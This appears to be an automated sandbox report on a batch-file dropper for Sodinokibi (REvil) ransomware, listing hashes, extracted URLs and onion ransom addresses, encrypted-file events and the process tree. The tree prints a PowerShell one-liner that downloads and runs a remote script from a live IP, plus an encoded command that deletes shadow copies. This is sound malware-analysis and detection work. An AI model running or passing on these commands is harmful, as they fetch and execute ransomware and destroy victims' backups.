Analysis
- max time kernel: 107s
- max time network: 100s
- platform: windows7_x64
- resource: win7v200217
- submitted: 06-03-2020 05:10
Static task: static1
Behavioral task: behavioral1
- Sample: yv3bZq0C.bat
- Resource: win7v200217
Behavioral task: behavioral2
- Sample: yv3bZq0C.bat
- Resource: win10v200217
General
- Target: yv3bZq0C.bat
- Size: 192B
- MD5: 986293d617a3f38c055066d8971343fc
- SHA1: 04a3044011926264954034bfeb463e7d9334018b
- SHA256: 083231c01b3b9c859b9683303c6bc946c15210cda94df73f79350c94366fd859
- SHA512: befebd114ce90e8db3d026c2775cf8be09a714b6c2548d3728e7e89a3d01f3a385a3516740e103e380e3c8fb95552fc20103d3745520464e6976c23d777dfc34
Malware Config
Extracted
- http://185.103.242.78/pastes/yv3bZq0C
Extracted
- C:\w96xs84y4-readme.txt
- sodinokibi
- http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/E4417BDFD428A681
- http://decryptor.cc/E4417BDFD428A681
Signatures
Discovering connected drives (3 TTPs, 7 IoCs)
Processes: powershell.exe, cmd.exe, powershell.exe
- File opened (read-only): \??\C: (powershell.exe)
- File opened (read-only): \??\A: (powershell.exe)
- File opened (read-only): \??\B: (powershell.exe)
- File opened (read-only): \??\E: (powershell.exe)
- File opened (read-only): \??\C: (cmd.exe)
- File opened (read-only): \??\F: (powershell.exe)
- File opened (read-only): \??\C: (powershell.exe)
Sodin, Sodinokibi, REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
Drops file in Program Files directory (33 IoCs)
Processes: powershell.exe
- File renamed: C:\Program Files\EditRepair.mpv2 => \??\c:\program files\EditRepair.mpv2.w96xs84y4 (powershell.exe)
- File opened for modification: \??\c:\program files\GrantOpen.inf (powershell.exe)
- File renamed: C:\Program Files\ExpandProtect.ods => \??\c:\program files\ExpandProtect.ods.w96xs84y4 (powershell.exe)
- File renamed: C:\Program Files\GrantOpen.inf => \??\c:\program files\GrantOpen.inf.w96xs84y4 (powershell.exe)
- File renamed: C:\Program Files\RestartSave.xltm => \??\c:\program files\RestartSave.xltm.w96xs84y4 (powershell.exe)
- File created: \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\w96xs84y4-readme.txt (powershell.exe)
- File opened for modification: \??\c:\program files\DisableCopy.M2T (powershell.exe)
- File opened for modification: \??\c:\program files\ExpandProtect.ods (powershell.exe)
- File opened for modification: \??\c:\program files\LockBackup.au (powershell.exe)
- File created: \??\c:\program files\microsoft sql server compact edition\w96xs84y4-readme.txt (powershell.exe)
- File opened for modification: \??\c:\program files\SuspendGrant.m4a (powershell.exe)
- File renamed: C:\Program Files\RestartUninstall.midi => \??\c:\program files\RestartUninstall.midi.w96xs84y4 (powershell.exe)
- File created: \??\c:\program files (x86)\w96xs84y4-readme.txt (powershell.exe)
- File opened for modification: \??\c:\program files\SplitRestart.bmp (powershell.exe)
- File opened for modification: \??\c:\program files\UnpublishConvertTo.rmi (powershell.exe)
- File renamed: C:\Program Files\SkipApprove.xhtml => \??\c:\program files\SkipApprove.xhtml.w96xs84y4 (powershell.exe)
- File renamed: C:\Program Files\UnpublishSync.aifc => \??\c:\program files\UnpublishSync.aifc.w96xs84y4 (powershell.exe)
- File opened for modification: \??\c:\program files\ConvertToFormat.ini (powershell.exe)
- File opened for modification: \??\c:\program files\EditRepair.mpv2 (powershell.exe)
- File opened for modification: \??\c:\program files\MoveWait.tif (powershell.exe)
- File renamed: C:\Program Files\SuspendGrant.m4a => \??\c:\program files\SuspendGrant.m4a.w96xs84y4 (powershell.exe)
- File renamed: C:\Program Files\SplitRestart.bmp => \??\c:\program files\SplitRestart.bmp.w96xs84y4 (powershell.exe)
- File created: \??\c:\program files\w96xs84y4-readme.txt (powershell.exe)
- File renamed: C:\Program Files\ConvertToFormat.ini => \??\c:\program files\ConvertToFormat.ini.w96xs84y4 (powershell.exe)
- File renamed: C:\Program Files\LockBackup.au => \??\c:\program files\LockBackup.au.w96xs84y4 (powershell.exe)
- File opened for modification: \??\c:\program files\RestartSave.xltm (powershell.exe)
- File created: \??\c:\program files\microsoft sql server compact edition\v3.5\w96xs84y4-readme.txt (powershell.exe)
- File opened for modification: \??\c:\program files\SkipApprove.xhtml (powershell.exe)
- File renamed: C:\Program Files\MoveWait.tif => \??\c:\program files\MoveWait.tif.w96xs84y4 (powershell.exe)
- File opened for modification: \??\c:\program files\UnpublishSync.aifc (powershell.exe)
- File renamed: C:\Program Files\DisableCopy.M2T => \??\c:\program files\DisableCopy.M2T.w96xs84y4 (powershell.exe)
- File opened for modification: \??\c:\program files\RestartUninstall.midi (powershell.exe)
- File renamed: C:\Program Files\UnpublishConvertTo.rmi => \??\c:\program files\UnpublishConvertTo.rmi.w96xs84y4 (powershell.exe)
Sets desktop wallpaper using registry (2 TTPs, 1 IoCs)
Processes: powershell.exe
- Set value (str): \REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\9861h714gsw71.bmp" (powershell.exe)
Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoCs)
Processes: powershell.exe
- PID 1884 powershell.exe
Suspicious use of WriteProcessMemory (5 IoCs)
Processes: cmd.exe, powershell.exe
- PID 1860 wrote to memory of 1884: 1860 cmd.exe -> powershell.exe
- PID 1884 wrote to memory of 1976: 1884 powershell.exe -> powershell.exe
- PID 1884 wrote to memory of 1976: 1884 powershell.exe -> powershell.exe
- PID 1884 wrote to memory of 1976: 1884 powershell.exe -> powershell.exe
- PID 1884 wrote to memory of 1976: 1884 powershell.exe -> powershell.exe
Suspicious use of AdjustPrivilegeToken (6 IoCs)
Processes: powershell.exe, powershell.exe, vssvc.exe
- Token: SeDebugPrivilege, PID 1884 powershell.exe
- Token: SeDebugPrivilege, PID 1884 powershell.exe
- Token: SeDebugPrivilege, PID 1976 powershell.exe
- Token: SeBackupPrivilege, PID 1392 vssvc.exe
- Token: SeRestorePrivilege, PID 1392 vssvc.exe
- Token: SeAuditPrivilege, PID 1392 vssvc.exe
Suspicious behavior: EnumeratesProcesses (5 IoCs)
Processes: powershell.exe, powershell.exe
- PID 1884 powershell.exe
- PID 1884 powershell.exe
- PID 1884 powershell.exe
- PID 1976 powershell.exe
- PID 1976 powershell.exe
Blacklisted process makes network request (1 IoCs)
Processes: powershell.exe
- flow 3, PID 1884 powershell.exe
Modifies service (2 TTPs, 4 IoCs)
Processes: vssvc.exe
- Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer (vssvc.exe)
- Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer (vssvc.exe)
- Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer (vssvc.exe)
- Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer (vssvc.exe)
Processes
- C:\Windows\system32\cmd.exe
  cmd /c "C:\Users\Admin\AppData\Local\Temp\yv3bZq0C.bat"
  - Discovering connected drives
  - Suspicious use of WriteProcessMemory
  PID: 1860
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/yv3bZq0C');Invoke-IAADNEEFN;Start-Sleep -s 10000"
    - Discovering connected drives
    - Drops file in Program Files directory
    - Sets desktop wallpaper using registry
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious use of WriteProcessMemory
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious behavior: EnumeratesProcesses
    - Blacklisted process makes network request
    PID: 1884
    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      - Discovering connected drives
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious behavior: EnumeratesProcesses
      PID: 1976
- C:\Windows\system32\vssvc.exe
  C:\Windows\system32\vssvc.exe
  - Suspicious use of AdjustPrivilegeToken
  - Modifies service
  PID: 1392